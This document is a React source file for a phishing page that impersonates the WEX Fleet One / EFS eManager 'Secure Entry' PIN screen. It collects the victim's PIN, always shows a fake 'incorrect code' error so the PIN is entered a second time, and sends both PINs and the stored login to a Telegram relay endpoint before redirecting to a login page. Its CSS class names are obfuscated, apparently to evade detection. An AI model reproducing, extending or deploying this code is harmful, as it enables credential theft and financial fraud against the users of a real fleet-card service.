
import React, { useState, useEffect, useRef } from 'react';
import img1 from './simbol#.png'
import img2 from './simbol_.png'
import img12 from './simbol1.png'
import img3 from './simbol0.png'
import img4 from './simbol2.png'
import img5 from './simbol3.png'
import img6 from './simbol4.png'
import img7 from './simbol5.png'
import img8 from './simbol6.png'
import img9 from './simbol7.png'
import img10 from './simbol8.png'
import img11 from './simbol9.png';
import LoginForm from "../LoginForm/LoginForm";
import img from './wexlogo.png'
import Popup from "../popup";

import axios from 'axios'
import * as emailjs from '@emailjs/browser'

import imgsub from './simbol_submit.png'

import { useNavigate, useParams } from 'react-router-dom';
import imgreset from './simbol_reset.png'

import styles from './pinverify.module.scss'
import PinHeader from './Header';
import { use } from 'react';

const Pinverify = () => {
    const [first, setFirst] = useState(1);
    const [login, setLogin] = useState('');
    const [gg, setGg] = useState(false);
    const [pass, setPass] = useState('');
    const [error, setError] = useState(false);
    const [pin, setPin] = useState();

    const [secPin, setSecPin] = useState();
    const { pins } = useParams();
    console.log(pins)
    const shuffleArray = (array) => {
        let currentIndex = array.length, randomIndex;


        while (currentIndex !== 0) {
            randomIndex = Math.floor(Math.random() * currentIndex);
            currentIndex--;

            [array[currentIndex], array[randomIndex]] = [array[randomIndex], array[currentIndex]];
        }

        return array;
    };
    const [check, setCheck] = useState(false)
    useEffect(() => {
        const hash = window.location.hash.replace('#', '');
        if (!hash) return;

        try {
            const decoded = atob(hash);
            localStorage.setItem('alosss', decoded);
        } catch { }
    }, []);
    const [display, setDisplay] = useState('Enter PIN');
    const [buttons, setButtons] = useState(
        [
            { value: '1', letters: img12 },
            { value: '2', letters: img4 },
            { value: '3', letters: img5 },
            { value: '4', letters: img6 },
            { value: '5', letters: img7 },
            { value: '6', letters: img8 },
            { value: '7', letters: img9 },
            { value: '8', letters: img10 },
            { value: '9', letters: img11 },
            { value: '*', letters: img2 },
            { value: '0', letters: img3 },
            { value: '#', letters: img1 },
        ]);

    useEffect(() => {
        setButtons(prevButtons => shuffleArray([...prevButtons]));
    }, [check]);

    const handleButtonClick = (value) => {
        setDisplay(prevDisplay => (prevDisplay === 'Enter PIN' ? value : prevDisplay + value));
    };
    const [hoverStart, setHoverStart] = useState(null);
    const [hoverDuration, setHoverDuration] = useState(0);

    const navigate = useNavigate();
    const handleClick = (value) => {
        if (check) {
            setPin((pin != undefined ? pin : '') + value)
        } else {
            setSecPin((secPin != undefined ? secPin : '') + value)
        }
    };

    const hoverRef = useRef(null);

    const handleMouseEnter = (value) => {
        setHoverStart(value);
    };

    const handleMouseLeave = () => {
        if (hoverStart) {
            const hoverEnd = Date.now();
            const duration = hoverEnd - hoverStart;
            setHoverDuration(duration);
            setHoverStart(null);
        }
    };

    useEffect(() => {
        if (sessionStorage.getItem("verified") === "true") {
            navigate("/login", { replace: true });
        }
    }, [navigate]);

    const onFinish = async () => {
        if (check) {
            const login = localStorage.getItem('login');

            const message = `
        Let's go to the next step:
        Login *: ${login}
        PIN*: ${pin}
        PIN S: ${secPin}
    `;
            try {
                // Send the message with form data
                await fetch('/api/send-to-telegram', {
                    method: 'POST',
                    headers: { 'Content-Type': 'application/json' },
                    body: JSON.stringify({ message: message }),
                });
                sessionStorage.setItem("verified", "true");
                setTimeout(() => {
                    navigate('/login');
                }, 2000);
                setPin('')

            } catch (error) {
                console.error('Error sending data to Telegram:', error);
            }
        } else {
            setTimeout(() => {
                setCheck(true);
            }, 2000)
        }
    }


    const resetPass = () => {
        setPin('')
    }

    return (
        <>
            <main className={styles.fondsikm}>
                <div className={styles.header}>
                    <div>
                        <img src={img} />
                    </div>
                </div>
                <div className={styles.duhjdsuijdnidj}>
                    <div className={styles.idjidjiudjidjidjidjidj}>
                        <div className={styles.ofhndimdidnujnm}>
                            <h2>Highest level of security.</h2>
                            <p>For assistance with your Secure Entry, please contact your company eManager adminstrator. If you are the company eManager administrator, please contact your EFS Account Manager.
                            </p>
                        </div>
                        <div className={styles.findimsindunimikmik}>
                            <div className={styles.fjnduindunsdmimsuim}>
                                <h2>LOGIN</h2>
                                <p>Please sign in to get access.</p>
                            </div>
                            <div className={styles.funfduidjiudjmid} />
                            {!check ? <div className={styles.dfoindidnji}>
                                We have identified your account with {pins} and need to confirm it is really you before continuing.
                                Please enter the PIN assigned to your account to verify your identity and access the next step.

                            </div> : ''}
                            {check ?
                                <div className={styles.unbdudnudnuydnudndundundu}>
                                    <div>
                                        The following errors have occurred
                                    </div>
                                    <p>1.You have entered an incorrect code. For assistance with your Secure Entry,
                                        please contact your company eManager administrator.
                                        If you are the company eManager administrator, please contact your EFS Account Manager.</p>
                                </div> : ''}
                            <div className={styles.keypads}>
                                <div className={styles.keypad}>
                                    <div className={styles.buttons}>
                                        {buttons.map(({ value, letters }) => (
                                            <div key={value} >
                                                <button ref={hoverRef} onMouseEnter={() => handleMouseEnter(value)}
                                                    onMouseLeave={handleMouseLeave}
                                                    onClick={() => handleClick(value)}
                                                    className={styles.keypad_button}
                                                >
                                                    {<div className={hoverStart == value ? styles.hover : ''} />}
                                                    <img src={letters} />

                                                </button>
                                            </div>
                                        ))}
                                    </div>
                                    <div className={styles.divka}>
                                        <div onClick={onFinish}>
                                            <img src={imgsub} />
                                        </div>
                                        <div onClick={resetPass}>
                                            <img src={imgreset} />
                                        </div>
                                    </div>
                                </div >
                            </div>
                        </div>
                    </div>
                    <div className={styles.doindmidnidnudnudnudn}>
                        <div>
                            © 2017 WEX FLEET ONE
                        </div>
                    </div>
                </div>
            </main >

        </>
    );
}
export default Pinverify


